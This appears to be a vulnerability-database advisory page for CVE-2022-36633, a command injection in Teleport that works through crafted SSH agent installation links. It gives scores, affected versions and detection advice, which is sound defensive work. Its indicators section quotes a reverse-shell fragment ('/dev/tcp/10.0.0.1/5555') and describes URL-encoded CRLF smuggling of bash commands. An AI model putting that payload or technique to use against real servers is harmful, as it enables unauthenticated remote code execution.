cbcvebase.
CVE-2022-36633
published 2022-08-24

CVE-2022-36633: Teleport 9.3.6 is vulnerable to Command injection leading to Remote Code Execution. An attacker can craft a malicious ssh agent installation link by URL…

PriorityP275high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
49.48%
98.7th percentile
Teleport 9.3.6 is vulnerable to Command injection leading to Remote Code Execution. An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is fully unauthenticated attack utilizing the trusted teleport server to deliver the payload.

Affected

4 ranges
VendorProductVersion rangeFixed in
github.comgravitational_teleport>= 0 < 8.3.178.3.17
github.comgravitational_teleport>= 10.0.0 < 10.1.210.1.2
github.comgravitational_teleport>= 9.0.0 < 9.3.139.3.13
goteleportteleport< 10.1.210.1.2

Detection & IOCsextracted from sources · hover to see the quote

command/dev/tcp/10.0.0.1/5555 0>&1 #
  • Look for URL-encoded carriage return line feed (CRLF) sequences in Teleport SSH agent installation token parameters — this is the injection vector used to smuggle bash commands into the install link.
  • The attack is fully unauthenticated — monitor Teleport install/token endpoints for anomalous or URL-encoded payloads from unauthenticated sources.
  • Watch for outbound /dev/tcp reverse-shell connections originating from the Teleport server process, indicative of successful RCE via the injected payload.
  • ·The IP address and port in the exploit PoC (10.0.0.1:5555) are attacker-controlled placeholders — real-world attacks will use different callback IPs/ports; do not rely on these specific values for blocking.
  • ·The vulnerability was reported against Teleport 9.3.6 but the PoC exploit targets v10.1.1, suggesting the affected version range spans at least 9.3.6–10.1.1.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.